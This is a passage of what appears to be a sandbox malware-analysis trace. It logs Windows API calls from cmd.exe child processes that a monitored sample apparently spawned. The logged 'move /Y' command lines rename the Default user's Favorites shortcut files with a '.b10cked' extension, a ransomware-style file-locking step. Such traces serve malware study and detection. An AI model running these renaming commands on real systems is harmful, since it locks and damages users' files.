returned 1 [0213.706] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL", fInfoLevelId=0x1, lpFindFileData=0x231c50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x231c50) returned 0x220f28 [0213.706] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked", nBufferLength=0x104, lpBuffer=0x20e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked", lpFilePart=0x0) returned 0x47 [0213.706] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url", nBufferLength=0x104, lpBuffer=0x20e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url", lpFilePart=0x0) returned 0x3f [0213.706] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ie site on microsoft.com.url")) returned 0x20 [0213.706] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ie site on microsoft.com.url.b10cked"), dwFlags=0x3) returned 1 [0214.044] FindClose (in: hFindFile=0x220f28 | out: hFindFile=0x220f28) returned 1 [0214.045] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20e8a8 | out: _Buffer=" 1") returned 9 [0214.045] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.045] GetFileType (hFile=0x7) returned 0x2 [0214.045] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.045] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20e834 | out: lpMode=0x20e834) returned 1 [0214.045] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.045] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20e868 | out: lpConsoleScreenBufferInfo=0x20e868) returned 1 [0214.045] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0214.046] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20e8a8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0214.046] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20e88c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20e88c*=0x1a) returned 1 [0214.046] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.046] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.046] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.046] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.046] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.046] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.047] SetConsoleInputExeNameW () returned 0x1 [0214.047] GetConsoleOutputCP () returned 0x1b5 [0214.047] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.047] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.047] exit (_Code=0) Process: id = "525" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16800" os_pid = "0x998" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31399 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31400 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31401 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31402 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 31403 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31404 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31405 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31406 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31407 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31408 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31579 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31580 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31581 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31582 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 31583 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 31584 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31585 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31586 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31587 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31588 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31589 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31590 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31591 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31592 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31593 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 31594 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31595 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31596 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31597 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31598 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31599 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31600 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 31601 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 31602 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 726 os_tid = 0xdec [0213.914] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fdcc | out: lpSystemTimeAsFileTime=0x20fdcc*(dwLowDateTime=0xb44ce540, dwHighDateTime=0x1d440a9)) [0213.914] GetCurrentProcessId () returned 0x998 [0213.914] GetCurrentThreadId () returned 0xdec [0213.914] GetTickCount () returned 0x3bedb [0213.914] QueryPerformanceCounter (in: lpPerformanceCount=0x20fdc4 | out: lpPerformanceCount=0x20fdc4*=27070355512) returned 1 [0213.915] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0213.915] __set_app_type (_Type=0x1) [0213.915] __p__fmode () returned 0x76b331f4 [0213.915] __p__commode () returned 0x76b331fc [0213.915] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0213.916] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0213.916] GetCurrentThreadId () returned 0xdec [0213.916] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdec) returned 0x38 [0213.916] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.916] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0213.916] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.916] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.916] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fd5c | out: phkResult=0x20fd5c*=0x0) returned 0x2 [0213.916] VirtualQuery (in: lpAddress=0x20fd93, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.916] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0213.916] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0213.917] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.917] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0213.917] GetConsoleOutputCP () returned 0x1b5 [0213.917] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.917] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0213.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.917] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0213.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.917] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0213.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.917] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0213.918] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.918] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0213.918] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.918] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0213.918] GetEnvironmentStringsW () returned 0x3901b0* [0213.918] FreeEnvironmentStringsW (penv=0x3901b0) returned 1 [0213.918] GetEnvironmentStringsW () returned 0x3901b0* [0213.919] FreeEnvironmentStringsW (penv=0x3901b0) returned 1 [0213.919] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eccc | out: phkResult=0x20eccc*=0x40) returned 0x0 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0xe8, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x1, lpcbData=0x20ecd0*=0x4) returned 0x0 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x1, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x0, lpcbData=0x20ecd0*=0x4) returned 0x0 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x40, lpcbData=0x20ecd0*=0x4) returned 0x0 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x40, lpcbData=0x20ecd0*=0x4) returned 0x0 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x40, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0213.919] RegCloseKey (hKey=0x40) returned 0x0 [0213.919] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eccc | out: phkResult=0x20eccc*=0x40) returned 0x0 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x40, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x1, lpcbData=0x20ecd0*=0x4) returned 0x0 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x1, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x0, lpcbData=0x20ecd0*=0x4) returned 0x0 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x9, lpcbData=0x20ecd0*=0x4) returned 0x0 [0213.920] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x9, lpcbData=0x20ecd0*=0x4) returned 0x0 [0213.920] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x9, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0213.920] RegCloseKey (hKey=0x40) returned 0x0 [0213.920] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863af [0213.920] srand (_Seed=0x5b8863af) [0213.920] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked\"" [0213.920] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked\"" [0213.920] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.920] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x391910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0213.921] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0213.921] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.921] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.921] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0213.921] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0213.921] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0213.921] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0213.921] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0213.921] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0213.921] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0213.921] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0213.921] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0213.921] GetEnvironmentStringsW () returned 0x392300* [0213.922] FreeEnvironmentStringsW (penv=0x392300) returned 1 [0213.922] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.922] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.922] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0213.922] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0213.922] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0213.922] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0213.922] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0213.922] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0213.922] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0213.922] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0213.922] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20fa98 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.922] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20fa98, lpFilePart=0x20fa94 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20fa94*="Desktop") returned 0x18 [0213.922] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.922] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f814 | out: lpFindFileData=0x20f814) returned 0x390040 [0213.923] FindClose (in: hFindFile=0x390040 | out: hFindFile=0x390040) returned 1 [0213.923] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f814 | out: lpFindFileData=0x20f814) returned 0x390040 [0213.923] FindClose (in: hFindFile=0x390040 | out: hFindFile=0x390040) returned 1 [0213.923] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f814 | out: lpFindFileData=0x20f814) returned 0x390040 [0213.923] FindClose (in: hFindFile=0x390040 | out: hFindFile=0x390040) returned 1 [0213.923] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.923] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0213.923] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0213.923] GetEnvironmentStringsW () returned 0x392b20* [0213.924] FreeEnvironmentStringsW (penv=0x392b20) returned 1 [0213.924] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.924] GetConsoleOutputCP () returned 0x1b5 [0213.924] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.924] GetUserDefaultLCID () returned 0x409 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fbd8, cchData=128 | out: lpLCData="0") returned 2 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fbd8, cchData=128 | out: lpLCData="0") returned 2 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fbd8, cchData=128 | out: lpLCData="1") returned 2 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0213.925] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0213.927] GetConsoleTitleW (in: lpConsoleTitle=0x380900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.927] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.927] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0213.927] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0213.927] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0213.928] _wcsicmp (_String1="move", _String2=")") returned 68 [0213.928] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0213.928] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0213.928] _wcsicmp (_String1="IF", _String2="move") returned -4 [0213.928] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0213.928] _wcsicmp 